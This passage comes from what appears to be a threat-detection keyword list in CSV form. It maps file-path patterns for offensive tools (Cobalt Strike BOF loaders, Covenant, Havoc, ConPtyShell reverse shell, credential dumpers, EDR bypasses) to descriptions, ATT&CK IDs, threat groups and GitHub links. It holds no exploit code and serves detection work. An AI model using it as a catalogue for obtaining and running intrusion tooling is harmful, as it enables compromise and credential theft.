T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,1,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*/COFFLoader*,offensive_tool_keyword,cobaltstrike,This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/COFFLoader,1,1,N/A,10,10,386,62,2023-05-15T20:42:41Z,2021-02-19T19:14:43Z -*/COFFLoader2/*,offensive_tool_keyword,cobaltstrike,Load and execute COFF files and Cobalt Strike BOFs in-memory,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 
- TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/COFFLoader2,1,1,N/A,10,10,156,40,2022-09-13T14:58:30Z,2021-12-14T07:49:17Z -*/collection/screengrab*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*/com/blackh4t/*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*/combine_harvester.git*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 
- T1055.012,TA0005 - TA0006,N/A,N/A,Defense Evasion,https://github.com/m3f157O/combine_harvester,1,1,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*/comfoo.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/COM-Hunter.csproj*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,1,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*/COM-Hunter.exe*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - 
TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,1,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*/COM-Hunter.git*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,1,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*/COM-Hunter.sln*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,1,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*/commandcontrol/malware*.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/commando-vm*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,1,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*/commix.git,offensive_tool_keyword,commix,Automated All-in-One OS command injection and exploitation tool.,T1059 - T1053 - T1503,TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/commixproject/commix,1,1,N/A,N/A,10,4034,781,2023-09-29T06:39:41Z,2015-03-20T08:38:26Z -*/commix.py*,offensive_tool_keyword,commix,Automated All-in-One OS command injection and exploitation tool.,T1059 - T1053 - T1503,TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation 
tools,https://github.com/commixproject/commix,1,1,N/A,N/A,10,4034,781,2023-09-29T06:39:41Z,2015-03-20T08:38:26Z -*/common/beacon.go*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/common_pass.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*/completions/exegol.fish*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/ComunicationC2.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*/config/doNmapScanWin.bat *,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*/ConPtyShell/*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation 
tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*/ContainYourself.git*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*/CookieProcessor.cs*,offensive_tool_keyword,cobaltstrike,C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.,T1552.002 - T1027.001 - T1059.003 - T1003.001,TA0006 - TA0005 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF,1,1,N/A,10,10,104,14,2023-05-28T18:41:15Z,2023-05-28T18:30:02Z -*/Cooolis-ms/*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*/core/browser_darwin.go*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,1,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z -*/core/browser_linux.go*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,1,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z -*/core/browser_windows.go*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,1,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z -*/couchdb-databases.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/couchdb-stats.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Covenant*.cs*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/Covenant.git*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/Covenant/*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/CovenantUsers/*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/Cracked5pider/*,offensive_tool_keyword,cobaltstrike,Beacon Object File 
Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,1,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*/Cracked5pider/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/cracklord.git*,offensive_tool_keyword,cracklord,Queue and resource system for cracking passwords,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/jmmcatee/cracklord,1,1,N/A,10,4,377,74,2022-09-22T09:30:14Z,2013-12-09T23:10:54Z -*/cracklord/cmd/*,offensive_tool_keyword,cracklord,Queue and resource system for cracking passwords,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential 
Access,https://github.com/jmmcatee/cracklord,1,1,N/A,10,4,377,74,2022-09-22T09:30:14Z,2013-12-09T23:10:54Z -*/CrackMapExec.git,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/crackmapexec/cme.conf*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/cradle.ps1*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,1,N/A,N/A,N/A,N/A -*/Crassus.git*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,1,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z -*/Crassus-main*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,1,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z -*/crawler.py -u http*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information 
Gathering,https://github.com/eldraco/domain_analyzer,1,0,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z -*/createforestcache.py*,offensive_tool_keyword,bloodhound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069,TA0007,N/A,N/A,Frameworks,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*/createstager.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/cred_dump.rc*,offensive_tool_keyword,TheFatRat,Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.,T1027 - T1059 - T1105 - T1218,TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/Screetsec/TheFatRat,1,0,N/A,N/A,10,8267,2217,2023-06-11T19:16:05Z,2016-07-24T10:30:19Z -*/Cred_Dump.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*/credBandit/*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
